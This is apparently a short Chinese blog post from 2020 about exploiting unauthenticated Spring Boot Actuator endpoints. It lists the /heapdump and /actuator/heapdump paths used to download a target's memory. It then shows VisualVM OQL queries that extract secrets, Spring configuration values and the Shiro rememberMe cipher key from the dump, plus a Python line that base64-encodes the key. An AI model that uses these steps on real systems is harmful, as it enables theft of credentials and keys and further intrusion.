Actuator 未授权访问之heapdump利用

actuator 下载heapdump 文件

若目标网站存在actuator未授权访问漏洞,一般访问如下链接可下载内存文件

/heapdump
/actuator/heapdump

 

工具

利用 visualvm 打开下载的heapdump文件
https://visualvm.github.io/download.html

根据 env 中的字符串查找secret

打开visualvm右边选择OQL Console, 下方输入如下,点击查询

select s from java.lang.String s 
    where /wx081111111/.test(s.value.toString())

根据查询结果可以获取到secret

查找spring config中的配置

右上角点击Objects 下方输入框输入,点击查询,也可以获取到前台打码的信息

org.springframework.core.env.MapPropertySource

查找Shiro CipherKey

过滤条件输入
org.apache.shiro.web.mgt.CookieRememberMeManager


可通过下面python代码将byte 转换成base64编码的key

base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -108,-108,-108,-108,52,-80,-42,-32,34,-68,3,-109,111,-43,-81,-25))
posted @ 2020-05-15 10:44  艾斯泽  阅读(10210)  评论(0编辑  收藏  举报